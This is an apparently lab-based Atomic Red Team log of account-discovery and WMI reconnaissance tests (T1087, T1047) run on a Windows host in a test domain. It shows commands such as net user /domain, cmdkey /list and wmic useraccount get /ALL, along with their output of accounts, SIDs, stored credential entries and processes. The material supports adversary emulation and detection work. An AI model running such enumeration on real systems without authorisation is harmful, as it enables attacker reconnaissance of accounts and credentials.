5591 + CategoryInfo : NotSpecified: ('get-localgroup...ternal command,:String) [], RemoteException
5592 + FullyQualifiedErrorId : NativeCommandError
5593
5594operable program or batch file.
5595
5596
5597Currently stored credentials:
5598
5599 Target: WindowsLive:target=virtualapp/didlogical
5600 Type: Generic
5601 User: 02nfphqvmirskagn
5602 Local machine persistence
5603
5604cmd.exe : 'ls' is not recognized as an internal or external command,
5605At line:1 char:1
5606+ cmd.exe /c "ls C:/Users"
5607+ ~~~~~~~~~~~~~~~~~~~~~~~~
5608 + CategoryInfo : NotSpecified: ('ls' is not rec...ternal command,:String) [], RemoteException
5609 + FullyQualifiedErrorId : NativeCommandError
5610
5611operable program or batch file.
5612
5613cmd.exe : 'get-childitem' is not recognized as an internal or external command,
5614At line:1 char:1
5615+ cmd.exe /c "get-childitem C:\Users\"
5616+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
5617 + CategoryInfo : NotSpecified: ('get-childitem'...ternal command,:String) [], RemoteException
5618 + FullyQualifiedErrorId : NativeCommandError
5619
5620operable program or batch file.
5621
5622 Volume in drive C has no label.
5623 Volume Serial Number is 4E0A-017A
5624
5625 Directory of C:\Users
5626
562707/10/2019 05:16 PM <DIR> .
562807/10/2019 05:16 PM <DIR> ..
562909/03/2019 03:33 AM <DIR> pgustavo
563007/04/2019 09:07 PM <DIR> Public
563107/10/2019 10:29 AM <DIR> User
5632 0 File(s) 0 bytes
5633 5 Dir(s) 40,884,535,296 bytes free
5634cmd.exe : 'get-aduser' is not recognized as an internal or external command,
5635At line:1 char:1
5636+ cmd.exe /c "get-aduser -filter *"
5637+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
5638 + CategoryInfo : NotSpecified: ('get-aduser' is...ternal command,:String) [], RemoteException
5639 + FullyQualifiedErrorId : NativeCommandError
5640
5641operable program or batch file.
5642
5643cmd.exe : 'get-localgroup' is not recognized as an internal or external command,
5644At line:1 char:1
5645+ cmd.exe /c "get-localgroup"
5646+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~
5647 + CategoryInfo : NotSpecified: ('get-localgroup...ternal command,:String) [], RemoteException
5648 + FullyQualifiedErrorId : NativeCommandError
5649
5650operable program or batch file.
5651
5652
5653Aliases for \\IT001
5654
5655-------------------------------------------------------------------------------
5656*Access Control Assistance Operators
5657*Administrators
5658*Backup Operators
5659*Cryptographic Operators
5660*Device Owners
5661*Distributed COM Users
5662*Event Log Readers
5663*Guests
5664*Hyper-V Administrators
5665*IIS_IUSRS
5666*Network Configuration Operators
5667*Performance Log Users
5668*Performance Monitor Users
5669*Power Users
5670*Remote Desktop Users
5671*Remote Management Users
5672*Replicator
5673*System Managed Accounts Group
5674*Users
5675The command completed successfully.
5676
5677Determining tests for Windows
5678Determining manual tests
5679[********BEGIN TEST*******]
5680Account Discovery T1087
5681Enumerate all accounts via PowerShell
5682Enumerate all accounts via PowerShell
5683
5684Invoking Atomic Tests using defined executor
5685Performing the operation "Execute Atomic Test" on target "Enumerate all accounts via PowerShell".
5686PowerShell:
5687 net user
5688net user /domain
5689get-localuser
5690get-localgroupmembers -group Users
5691cmdkey.exe /list
5692ls C:/Users
5693get-childitem C:\Users\
5694dir C:\Users\
5695get-aduser -filter *
5696get-localgroup
5697net localgroup
5698
5699PowerShell
5700 net user
5701net user /domain
5702get-localuser
5703get-localgroupmembers -group Users
5704cmdkey.exe /list
5705ls C:/Users
5706get-childitem C:\Users\
5707dir C:\Users\
5708get-aduser -filter *
5709get-localgroup
5710net localgroup
5711
5712
5713User accounts for \\IT001
5714
5715-------------------------------------------------------------------------------
5716Administrator Atomic DefaultAccount
5717Guest User WDAGUtilityAccount
5718The command completed successfully.
5719
5720The request will be processed at a domain controller for domain shire.com.
5721
5722
5723User accounts for \\HFDC1.shire.com
5724
5725-------------------------------------------------------------------------------
5726Administrator aragorn bilbo
5727boromir DefaultAccount elrond
5728frodo gandalf gimili
5729Guest krbtgt legolas
5730lrodriguez merry nmartha
5731pgustavo pippin samwise
5732saruman smaug wecserver
5733The command completed successfully.
5734
5735Adm... False Built-in...
5736Atomic True Red
5737Def... False A user a...
5738Guest False Built-in...
5739User True
5740WDA... False A user a...
5741get-localgroupmembers : The term 'get-localgroupmembers' is not recognized as the name of a cmdlet, function, script
5742file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct
5743and try again.
5744At line:4 char:1
5745+ get-localgroupmembers -group Users
5746+ ~~~~~~~~~~~~~~~~~~~~~
5747 + CategoryInfo : ObjectNotFound: (get-localgroupmembers:String) [], CommandNotFoundException
5748 + FullyQualifiedErrorId : CommandNotFoundException
5749
5750
5751Currently stored credentials:
5752
5753 Target: WindowsLive:target=virtualapp/didlogical
5754 Type: Generic
5755 User: 02nfphqvmirskagn
5756 Local machine persistence
5757
5758
5759PSPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\pgustavo
5760PSParentPath : Microsoft.PowerShell.Core\FileSystem::C:\Users
5761PSChildName : pgustavo
5762PSDrive : C
5763PSProvider : Microsoft.PowerShell.Core\FileSystem
5764PSIsContainer : True
5765Name : pgustavo
5766FullName : C:\Users\pgustavo
5767Parent : Users
5768Exists : True
5769Root : C:\
5770Extension :
5771CreationTime : 7/10/2019 5:16:07 PM
5772CreationTimeUtc : 7/11/2019 12:16:07 AM
5773LastAccessTime : 9/3/2019 3:33:36 AM
5774LastAccessTimeUtc : 9/3/2019 10:33:36 AM
5775LastWriteTime : 9/3/2019 3:33:36 AM
5776LastWriteTimeUtc : 9/3/2019 10:33:36 AM
5777Attributes : Directory
5778Mode : d-----
5779BaseName : pgustavo
5780Target : {}
5781LinkType :
5782
5783
5784PSPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\Public
5785PSParentPath : Microsoft.PowerShell.Core\FileSystem::C:\Users
5786PSChildName : Public
5787PSDrive : C
5788PSProvider : Microsoft.PowerShell.Core\FileSystem
5789PSIsContainer : True
5790Name : Public
5791FullName : C:\Users\Public
5792Parent : Users
5793Exists : True
5794Root : C:\
5795Extension :
5796CreationTime : 4/11/2018 4:38:20 PM
5797CreationTimeUtc : 4/11/2018 11:38:20 PM
5798LastAccessTime : 9/3/2019 3:25:29 AM
5799LastAccessTimeUtc : 9/3/2019 10:25:29 AM
5800LastWriteTime : 7/4/2019 9:07:13 PM
5801LastWriteTimeUtc : 7/5/2019 4:07:13 AM
5802Attributes : ReadOnly, Directory
5803Mode : d-r---
5804BaseName : Public
5805Target : {}
5806LinkType :
5807
5808
5809PSPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\User
5810PSParentPath : Microsoft.PowerShell.Core\FileSystem::C:\Users
5811PSChildName : User
5812PSDrive : C
5813PSProvider : Microsoft.PowerShell.Core\FileSystem
5814PSIsContainer : True
5815Name : User
5816FullName : C:\Users\User
5817Parent : Users
5818Exists : True
5819Root : C:\
5820Extension :
5821CreationTime : 7/4/2019 9:05:38 PM
5822CreationTimeUtc : 7/5/2019 4:05:38 AM
5823LastAccessTime : 9/3/2019 3:06:44 AM
5824LastAccessTimeUtc : 9/3/2019 10:06:44 AM
5825LastWriteTime : 7/10/2019 10:29:50 AM
5826LastWriteTimeUtc : 7/10/2019 5:29:50 PM
5827Attributes : Directory
5828Mode : d-----
5829BaseName : User
5830Target : {}
5831LinkType :
5832
5833
5834PSPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\pgustavo
5835PSParentPath : Microsoft.PowerShell.Core\FileSystem::C:\Users
5836PSChildName : pgustavo
5837PSDrive : C
5838PSProvider : Microsoft.PowerShell.Core\FileSystem
5839PSIsContainer : True
5840Name : pgustavo
5841FullName : C:\Users\pgustavo
5842Parent : Users
5843Exists : True
5844Root : C:\
5845Extension :
5846CreationTime : 7/10/2019 5:16:07 PM
5847CreationTimeUtc : 7/11/2019 12:16:07 AM
5848LastAccessTime : 9/3/2019 3:33:36 AM
5849LastAccessTimeUtc : 9/3/2019 10:33:36 AM
5850LastWriteTime : 9/3/2019 3:33:36 AM
5851LastWriteTimeUtc : 9/3/2019 10:33:36 AM
5852Attributes : Directory
5853Mode : d-----
5854BaseName : pgustavo
5855Target : {}
5856LinkType :
5857
5858
5859PSPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\Public
5860PSParentPath : Microsoft.PowerShell.Core\FileSystem::C:\Users
5861PSChildName : Public
5862PSDrive : C
5863PSProvider : Microsoft.PowerShell.Core\FileSystem
5864PSIsContainer : True
5865Name : Public
5866FullName : C:\Users\Public
5867Parent : Users
5868Exists : True
5869Root : C:\
5870Extension :
5871CreationTime : 4/11/2018 4:38:20 PM
5872CreationTimeUtc : 4/11/2018 11:38:20 PM
5873LastAccessTime : 9/3/2019 3:25:29 AM
5874LastAccessTimeUtc : 9/3/2019 10:25:29 AM
5875LastWriteTime : 7/4/2019 9:07:13 PM
5876LastWriteTimeUtc : 7/5/2019 4:07:13 AM
5877Attributes : ReadOnly, Directory
5878Mode : d-r---
5879BaseName : Public
5880Target : {}
5881LinkType :
5882
5883
5884PSPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\User
5885PSParentPath : Microsoft.PowerShell.Core\FileSystem::C:\Users
5886PSChildName : User
5887PSDrive : C
5888PSProvider : Microsoft.PowerShell.Core\FileSystem
5889PSIsContainer : True
5890Name : User
5891FullName : C:\Users\User
5892Parent : Users
5893Exists : True
5894Root : C:\
5895Extension :
5896CreationTime : 7/4/2019 9:05:38 PM
5897CreationTimeUtc : 7/5/2019 4:05:38 AM
5898LastAccessTime : 9/3/2019 3:06:44 AM
5899LastAccessTimeUtc : 9/3/2019 10:06:44 AM
5900LastWriteTime : 7/10/2019 10:29:50 AM
5901LastWriteTimeUtc : 7/10/2019 5:29:50 PM
5902Attributes : Directory
5903Mode : d-----
5904BaseName : User
5905Target : {}
5906LinkType :
5907
5908
5909PSPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\pgustavo
5910PSParentPath : Microsoft.PowerShell.Core\FileSystem::C:\Users
5911PSChildName : pgustavo
5912PSDrive : C
5913PSProvider : Microsoft.PowerShell.Core\FileSystem
5914PSIsContainer : True
5915Name : pgustavo
5916FullName : C:\Users\pgustavo
5917Parent : Users
5918Exists : True
5919Root : C:\
5920Extension :
5921CreationTime : 7/10/2019 5:16:07 PM
5922CreationTimeUtc : 7/11/2019 12:16:07 AM
5923LastAccessTime : 9/3/2019 3:33:36 AM
5924LastAccessTimeUtc : 9/3/2019 10:33:36 AM
5925LastWriteTime : 9/3/2019 3:33:36 AM
5926LastWriteTimeUtc : 9/3/2019 10:33:36 AM
5927Attributes : Directory
5928Mode : d-----
5929BaseName : pgustavo
5930Target : {}
5931LinkType :
5932
5933
5934PSPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\Public
5935PSParentPath : Microsoft.PowerShell.Core\FileSystem::C:\Users
5936PSChildName : Public
5937PSDrive : C
5938PSProvider : Microsoft.PowerShell.Core\FileSystem
5939PSIsContainer : True
5940Name : Public
5941FullName : C:\Users\Public
5942Parent : Users
5943Exists : True
5944Root : C:\
5945Extension :
5946CreationTime : 4/11/2018 4:38:20 PM
5947CreationTimeUtc : 4/11/2018 11:38:20 PM
5948LastAccessTime : 9/3/2019 3:25:29 AM
5949LastAccessTimeUtc : 9/3/2019 10:25:29 AM
5950LastWriteTime : 7/4/2019 9:07:13 PM
5951LastWriteTimeUtc : 7/5/2019 4:07:13 AM
5952Attributes : ReadOnly, Directory
5953Mode : d-r---
5954BaseName : Public
5955Target : {}
5956LinkType :
5957
5958
5959PSPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\User
5960PSParentPath : Microsoft.PowerShell.Core\FileSystem::C:\Users
5961PSChildName : User
5962PSDrive : C
5963PSProvider : Microsoft.PowerShell.Core\FileSystem
5964PSIsContainer : True
5965Name : User
5966FullName : C:\Users\User
5967Parent : Users
5968Exists : True
5969Root : C:\
5970Extension :
5971CreationTime : 7/4/2019 9:05:38 PM
5972CreationTimeUtc : 7/5/2019 4:05:38 AM
5973LastAccessTime : 9/3/2019 3:06:44 AM
5974LastAccessTimeUtc : 9/3/2019 10:06:44 AM
5975LastWriteTime : 7/10/2019 10:29:50 AM
5976LastWriteTimeUtc : 7/10/2019 5:29:50 PM
5977Attributes : Directory
5978Mode : d-----
5979BaseName : User
5980Target : {}
5981LinkType :
5982
5983get-aduser : The term 'get-aduser' is not recognized as the name of a cmdlet, function, script file, or operable
5984program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
5985At line:9 char:1
5986+ get-aduser -filter *
5987+ ~~~~~~~~~~
5988 + CategoryInfo : ObjectNotFound: (get-aduser:String) [], CommandNotFoundException
5989 + FullyQualifiedErrorId : CommandNotFoundException
5990
5991
5992Description : Members of this group can remotely query authorization attributes and permissions for resources on
5993 this computer.
5994Name : Access Control Assistance Operators
5995SID : S-1-5-32-579
5996PrincipalSource : Local
5997ObjectClass : Group
5998
5999
6000Description :
6001Name : Administrators
6002SID : S-1-5-32-544
6003PrincipalSource : Local
6004ObjectClass : Group
6005
6006
6007Description : Backup Operators can override security restrictions for the sole purpose of backing up or restoring
6008 files
6009Name : Backup Operators
6010SID : S-1-5-32-551
6011PrincipalSource : Local
6012ObjectClass : Group
6013
6014
6015Description : Members are authorized to perform cryptographic operations.
6016Name : Cryptographic Operators
6017SID : S-1-5-32-569
6018PrincipalSource : Local
6019ObjectClass : Group
6020
6021
6022Description : Members of this group can change system-wide settings.
6023Name : Device Owners
6024SID : S-1-5-32-583
6025PrincipalSource : Local
6026ObjectClass : Group
6027
6028
6029Description : Members are allowed to launch, activate and use Distributed COM objects on this machine.
6030Name : Distributed COM Users
6031SID : S-1-5-32-562
6032PrincipalSource : Local
6033ObjectClass : Group
6034
6035
6036Description : Members of this group can read event logs from local machine
6037Name : Event Log Readers
6038SID : S-1-5-32-573
6039PrincipalSource : Local
6040ObjectClass : Group
6041
6042
6043Description : Guests have the same access as members of the Users group by default, except for the Guest account
6044 which is further restricted
6045Name : Guests
6046SID : S-1-5-32-546
6047PrincipalSource : Local
6048ObjectClass : Group
6049
6050
6051Description : Members of this group have complete and unrestricted access to all features of Hyper-V.
6052Name : Hyper-V Administrators
6053SID : S-1-5-32-578
6054PrincipalSource : Local
6055ObjectClass : Group
6056
6057
6058Description : Built-in group used by Internet Information Services.
6059Name : IIS_IUSRS
6060SID : S-1-5-32-568
6061PrincipalSource : Local
6062ObjectClass : Group
6063
6064
6065Description : Members in this group can have some administrative privileges to manage configuration of networking
6066 features
6067Name : Network Configuration Operators
6068SID : S-1-5-32-556
6069PrincipalSource : Local
6070ObjectClass : Group
6071
6072
6073Description : Members of this group may schedule logging of performance counters, enable trace providers, and
6074 collect event traces both locally and via remote access to this computer
6075Name : Performance Log Users
6076SID : S-1-5-32-559
6077PrincipalSource : Local
6078ObjectClass : Group
6079
6080
6081Description : Members of this group can access performance counter data locally and remotely
6082Name : Performance Monitor Users
6083SID : S-1-5-32-558
6084PrincipalSource : Local
6085ObjectClass : Group
6086
6087
6088Description : Power Users are included for backwards compatibility and possess limited administrative powers
6089Name : Power Users
6090SID : S-1-5-32-547
6091PrincipalSource : Local
6092ObjectClass : Group
6093
6094
6095Description : Members in this group are granted the right to logon remotely
6096Name : Remote Desktop Users
6097SID : S-1-5-32-555
6098PrincipalSource : Local
6099ObjectClass : Group
6100
6101
6102Description : Members of this group can access WMI resources over management protocols (such as WS-Management via
6103 the Windows Remote Management service). This applies only to WMI namespaces that grant access to the
6104 user.
6105Name : Remote Management Users
6106SID : S-1-5-32-580
6107PrincipalSource : Local
6108ObjectClass : Group
6109
6110
6111Description : Supports file replication in a domain
6112Name : Replicator
6113SID : S-1-5-32-552
6114PrincipalSource : Local
6115ObjectClass : Group
6116
6117
6118Description : Members of this group are managed by the system.
6119Name : System Managed Accounts Group
6120SID : S-1-5-32-581
6121PrincipalSource : Local
6122ObjectClass : Group
6123
6124
6125Description : Users are prevented from making accidental or intentional system-wide changes and can run most
6126 applications
6127Name : Users
6128SID : S-1-5-32-545
6129PrincipalSource : Local
6130ObjectClass : Group
6131
6132
6133Aliases for \\IT001
6134
6135-------------------------------------------------------------------------------
6136*Access Control Assistance Operators
6137*Administrators
6138*Backup Operators
6139*Cryptographic Operators
6140*Device Owners
6141*Distributed COM Users
6142*Event Log Readers
6143*Guests
6144*Hyper-V Administrators
6145*IIS_IUSRS
6146*Network Configuration Operators
6147*Performance Log Users
6148*Performance Monitor Users
6149*Power Users
6150*Remote Desktop Users
6151*Remote Management Users
6152*Replicator
6153*System Managed Accounts Group
6154*Users
6155The command completed successfully.
6156
6157Determining tests for Windows
6158Determining manual tests
6159[********BEGIN TEST*******]
6160Account Discovery T1087
6161Enumerate logged on users
6162Enumerate logged on users
6163
6164Invoking Atomic Tests using defined executor
6165Performing the operation "Execute Atomic Test" on target "Enumerate logged on users".
6166Command Prompt:
6167 query user
6168
6169Command Prompt:
6170 query user
6171
6172 USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
6173>pgustavo rdp-tcp#0 2 Active 2 9/3/2019 3:25 AM
6174Determining tests for Windows
6175Determining manual tests
6176[********BEGIN TEST*******]
6177Account Discovery T1087
6178Enumerate logged on users via PowerShell
6179Enumerate logged on users via PowerShell
6180
6181Invoking Atomic Tests using defined executor
6182Performing the operation "Execute Atomic Test" on target "Enumerate logged on users via PowerShell".
6183PowerShell:
6184 query user
6185
6186PowerShell
6187 query user
6188
6189 USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
6190>pgustavo rdp-tcp#0 2 Active 2 9/3/2019 3:25 AM
6191[!!!!!!!!END TEST!!!!!!!]
6192
6193
6194Executing T1047 technique
6195Attempting to run Atomic Techniques
6196Tarcking UUID is T1047_atomictest
6197Attempting to convert files from yaml
6198path: C:\AtomicRedTeam\atomics\T1047\T1047.yaml
6199file: C:\AtomicRedTeam\atomics\T1047\T1047.yaml
6200Converting C:\AtomicRedTeam\atomics\T1047\T1047.yaml from Yaml
6201Determining tests for Windows
6202Determining manual tests
6203[********BEGIN TEST*******]
6204Windows Management Instrumentation T1047
6205WMI Reconnaissance Users
6206WMI List User Accounts
6207
6208Invoking Atomic Tests using defined executor
6209Performing the operation "Execute Atomic Test" on target "WMI Reconnaissance Users".
6210Command Prompt:
6211 wmic useraccount get /ALL
6212
6213Command Prompt:
6214 wmic useraccount get /ALL
6215
6216AccountType Caption Description Disabled Domain FullName InstallDate LocalAccount Lockout Name PasswordChangeable PasswordExpires PasswordRequired SID SIDType Status
6217
6218512 IT001\Administrator Built-in account for administering the computer/domain TRUE IT001 TRUE FALSE Administrator TRUE FALSE TRUE S-1-5-21-2765686229-3643345068-3530821166-500 1 Degraded
6219
6220512 IT001\Atomic Red FALSE IT001 Atomic TRUE FALSE Atomic TRUE TRUE FALSE S-1-5-21-2765686229-3643345068-3530821166-1002 1 OK
6221
6222512 IT001\DefaultAccount A user account managed by the system. TRUE IT001 TRUE FALSE DefaultAccount TRUE FALSE FALSE S-1-5-21-2765686229-3643345068-3530821166-503 1 Degraded
6223
6224512 IT001\Guest Built-in account for guest access to the computer/domain TRUE IT001 TRUE FALSE Guest FALSE FALSE FALSE S-1-5-21-2765686229-3643345068-3530821166-501 1 Degraded
6225
6226512 IT001\User FALSE IT001 TRUE FALSE User TRUE FALSE FALSE S-1-5-21-2765686229-3643345068-3530821166-1001 1 OK
6227
6228512 IT001\WDAGUtilityAccount A user account managed and used by the system for Windows Defender Application Guard scenarios. TRUE IT001 TRUE FALSE WDAGUtilityAccount TRUE TRUE TRUE S-1-5-21-2765686229-3643345068-3530821166-504 1 Degraded
6229
6230512 SHIRE\Administrator Built-in account for administering the computer/domain FALSE SHIRE FALSE FALSE Administrator TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-500 1 OK
6231
6232512 SHIRE\Guest Built-in account for guest access to the computer/domain TRUE SHIRE FALSE FALSE Guest TRUE FALSE FALSE S-1-5-21-47903322-2936176756-2312637138-501 1 Degraded
6233
6234512 SHIRE\krbtgt Key Distribution Center Service Account TRUE SHIRE FALSE FALSE krbtgt TRUE TRUE TRUE S-1-5-21-47903322-2936176756-2312637138-502 1 Degraded
6235
6236512 SHIRE\DefaultAccount A user account managed by the system. TRUE SHIRE FALSE FALSE DefaultAccount TRUE FALSE FALSE S-1-5-21-47903322-2936176756-2312637138-503 1 Degraded
6237
6238512 SHIRE\pgustavo FALSE SHIRE Pedro Gustavo FALSE FALSE pgustavo TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-1103 1 OK
6239
6240512 SHIRE\lrodriguez FALSE SHIRE Lucho Rodriguez FALSE FALSE lrodriguez TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-1104 1 OK
6241
6242512 SHIRE\wecserver FALSE SHIRE Wec Server FALSE FALSE wecserver TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-1105 1 OK
6243
6244512 SHIRE\nmartha FALSE SHIRE Norah Martha FALSE FALSE nmartha TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-1106 1 OK
6245
6246512 SHIRE\gandalf FALSE SHIRE Gandalf TheWhite FALSE FALSE gandalf TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-1107 1 OK
6247
6248512 SHIRE\bilbo FALSE SHIRE Bilbo Baggins FALSE FALSE bilbo TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-1113 1 OK
6249
6250512 SHIRE\frodo FALSE SHIRE Frodo Baggins FALSE FALSE frodo TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-1114 1 OK
6251
6252512 SHIRE\merry FALSE SHIRE Merry Brandybuck FALSE FALSE merry TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-1115 1 OK
6253
6254512 SHIRE\pippin FALSE SHIRE Pippin Took FALSE FALSE pippin TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-1116 1 OK
6255
6256512 SHIRE\samwise FALSE SHIRE Samwise Gamgee FALSE FALSE samwise TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-1117 1 OK
6257
6258512 SHIRE\saruman FALSE SHIRE Saruman FALSE FALSE saruman TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-1118 1 OK
6259
6260512 SHIRE\smaug FALSE SHIRE Smaug FALSE FALSE smaug TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-1119 1 OK
6261
6262512 SHIRE\aragorn FALSE SHIRE Aragorn Arathorn FALSE FALSE aragorn TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-1120 1 OK
6263
6264512 SHIRE\gimili FALSE SHIRE Gimili Gloin FALSE FALSE gimili TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-1121 1 OK
6265
6266512 SHIRE\legolas FALSE SHIRE Legolas Greenleaf FALSE FALSE legolas TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-1122 1 OK
6267
6268512 SHIRE\boromir FALSE SHIRE Boromir FALSE FALSE boromir TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-1123 1 OK
6269
6270512 SHIRE\elrond FALSE SHIRE Elrond FALSE FALSE elrond TRUE FALSE TRUE S-1-5-21-47903322-2936176756-2312637138-1124 1 OK
6271
6272
6273
6274Determining tests for Windows
6275Determining manual tests
6276[********BEGIN TEST*******]
6277Windows Management Instrumentation T1047
6278WMI Reconnaissance Processes
6279WMI List Processes
6280
6281Invoking Atomic Tests using defined executor
6282Performing the operation "Execute Atomic Test" on target "WMI Reconnaissance Processes".
6283Command Prompt:
6284 wmic process get caption,executablepath,commandline
6285
6286Command Prompt:
6287 wmic process get caption,executablepath,commandline
6288
6289Caption CommandLine ExecutablePath
6290
6291System Idle Process
6292
6293System
6294
6295Registry
6296
6297smss.exe
6298
6299csrss.exe
6300
6301wininit.exe
6302
6303csrss.exe
6304
6305services.exe
6306
6307winlogon.exe winlogon.exe C:\Windows\system32\winlogon.exe
6308
6309lsass.exe C:\Windows\system32\lsass.exe C:\Windows\system32\lsass.exe
6310
6311fontdrvhost.exe "fontdrvhost.exe" C:\Windows\system32\fontdrvhost.exe
6312
6313fontdrvhost.exe "fontdrvhost.exe" C:\Windows\system32\fontdrvhost.exe
6314
6315svchost.exe c:\windows\system32\svchost.exe -k dcomlaunch -p -s PlugPlay c:\windows\system32\svchost.exe
6316
6317svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch -p C:\Windows\system32\svchost.exe
6318
6319svchost.exe c:\windows\system32\svchost.exe -k rpcss -p c:\windows\system32\svchost.exe
6320
6321svchost.exe c:\windows\system32\svchost.exe -k dcomlaunch -p -s LSM c:\windows\system32\svchost.exe
6322
6323LogonUI.exe "LogonUI.exe" /flags:0x0 /state0:0xa3bd2055 /state1:0x41c64e6d C:\Windows\system32\LogonUI.exe
6324
6325dwm.exe "dwm.exe" C:\Windows\system32\dwm.exe
6326
6327svchost.exe c:\windows\system32\svchost.exe -k networkservice -s TermService c:\windows\system32\svchost.exe
6328
6329svchost.exe c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s NcbService c:\windows\system32\svchost.exe
6330
6331svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s lmhosts c:\windows\system32\svchost.exe
6332
6333svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s nsi c:\windows\system32\svchost.exe
6334
6335svchost.exe c:\windows\system32\svchost.exe -k localservice -s W32Time c:\windows\system32\svchost.exe
6336
6337svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s TimeBrokerSvc c:\windows\system32\svchost.exe
6338
6339svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s Dhcp c:\windows\system32\svchost.exe
6340
6341svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s Dnscache c:\windows\system32\svchost.exe
6342
6343svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p -s Schedule c:\windows\system32\svchost.exe
6344
6345svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s EventLog c:\windows\system32\svchost.exe
6346
6347svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p -s ProfSvc c:\windows\system32\svchost.exe
6348
6349svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p -s UserManager c:\windows\system32\svchost.exe
6350
6351svchost.exe c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s UmRdpService c:\windows\system32\svchost.exe
6352
6353svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s EventSystem c:\windows\system32\svchost.exe
6354
6355svchost.exe c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s SysMain c:\windows\system32\svchost.exe
6356
6357svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p -s Themes c:\windows\system32\svchost.exe
6358
6359svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s NlaSvc c:\windows\system32\svchost.exe
6360
6361svchost.exe C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p C:\Windows\system32\svchost.exe
6362
6363svchost.exe c:\windows\system32\svchost.exe -k netsvcs -s CertPropSvc c:\windows\system32\svchost.exe
6364
6365Memory Compression
6366
6367svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p -s SENS c:\windows\system32\svchost.exe
6368
6369svchost.exe c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s AudioEndpointBuilder c:\windows\system32\svchost.exe
6370
6371svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s FontCache c:\windows\system32\svchost.exe
6372
6373svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s netprofm c:\windows\system32\svchost.exe
6374
6375svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s LanmanWorkstation c:\windows\system32\svchost.exe
6376
6377svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p C:\Windows\System32\svchost.exe
6378
6379svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p C:\Windows\System32\svchost.exe
6380
6381svchost.exe C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p C:\Windows\system32\svchost.exe
6382
6383svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p -s SessionEnv c:\windows\system32\svchost.exe
6384
6385svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p -s ShellHWDetection c:\windows\system32\svchost.exe
6386
6387svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s WinHttpAutoProxySvc c:\windows\system32\svchost.exe
6388
6389svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p -s IKEEXT c:\windows\system32\svchost.exe
6390
6391svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p -s Winmgmt c:\windows\system32\svchost.exe
6392
6393svchost.exe c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -p -s PolicyAgent c:\windows\system32\svchost.exe
6394
6395spoolsv.exe C:\Windows\System32\spoolsv.exe C:\Windows\System32\spoolsv.exe
6396
6397svchost.exe c:\windows\system32\svchost.exe -k netsvcs -p -s iphlpsvc c:\windows\system32\svchost.exe
6398
6399amazon-ssm-agent.exe "C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe" C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
6400
6401svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s CryptSvc c:\windows\system32\svchost.exe
6402
6403svchost.exe c:\windows\system32\svchost.exe -k localservicenonetwork -p -s DPS c:\windows\system32\svchost.exe
6404
6405LiteAgent.exe "C:\Program Files\Amazon\XenTools\LiteAgent.exe" C:\Program Files\Amazon\XenTools\LiteAgent.exe
6406
6407svchost.exe C:\Windows\System32\svchost.exe -k utcsvc -p C:\Windows\System32\svchost.exe
6408
